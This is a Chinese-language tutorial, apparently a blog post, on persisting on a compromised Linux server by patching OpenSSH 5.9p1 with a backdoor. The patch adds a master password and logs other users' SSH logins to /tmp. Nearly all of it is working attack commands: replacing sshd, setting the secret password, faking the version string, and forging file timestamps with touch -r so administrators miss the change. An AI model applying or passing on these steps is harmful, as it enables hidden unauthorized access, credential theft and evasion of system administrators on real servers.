当我们在获得一台Linux服务器的 root 权限后,我们第一想做的就是如何维持这个权限,维持权限肯定想到的就是在目标服务器留下一个后门。但是留普通后门,肯定很容易被发现。我们今天要讲的就是留一个SSH后门,是通过修改SSH源代码的方式来留一个万能的SSH密码。
环境:
软件包准备:
- openssh-5.9p1.tar.gz (正常的openssh包)
- openssh-5.9p1.patch.tar.gz (补丁包)
首先查看一下SSH的版本号,记录下来
ssh -V
安装依赖包:
yum -y install openssl openssl-devel pam-devel zlib zlib-devel 
重命名原来的ssh主程序和配置文件(作用是待会同步时间)
mv /etc/ssh/ssh_config /etc/ssh/ssh_config.bank
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bank
mv /usr/sbin/sshd /usr/sbin/sshd.bank
将软件包上传到根目录,并解压
tar -xzvf openssh-5.9p1.patch.tar.gz
tar -xzvf openssh-5.9p1.tar.gz
cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1 #移动补丁文件中的diff文件到正常ssh目录
cd openssh-5.9p1 #进入ssh正常目录
patch < sshbd5.9p1.diff #打补丁
修改后门密码和版本信息
vim includes.hSECRETPW 这里是万能密码,ILOG是别人用ssh登录该主机记录的日志目录,OLOG是该主机用ssh登录其他主机记录的日志目录
vim version.h将这里的版本号修改为刚开始使用ssh -V 查看的,避免被管理员发现
重新编译安装
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 && make && make install
如果这里出现了这个错误,是因为没有安装gcc编译库等编译环境
yum -y install gcc gcc-c++ make #安装编译环境安装了编译库环境后,重新编译安装,如果看到以下就说明编译成功
现在我们还要做的就是修改sshd程序和配置文件的时间,避免被管理员发现sshd程序发生了修改
touch -r ssh_config.bank ssh_config
touch -r sshd_config.bank sshd_config
touch -r /usr/sbin/sshd.bank /usr/sbin/sshd
重启sshd服务
service sshd restart #重启sshd服务
ssh -V #查看版本号
使用其他主机SSH登录该主机,使用万能密码 xie 看能否成功登录,如下登录成功!
在/tmp目录下会生成ilog和olog日志,当其他主机ssh登录该主机时(使用万能密码登录的不会记录),会生成ilog日志,当该主机ssh登录其他主机时,会生成olog日志。
参考文章: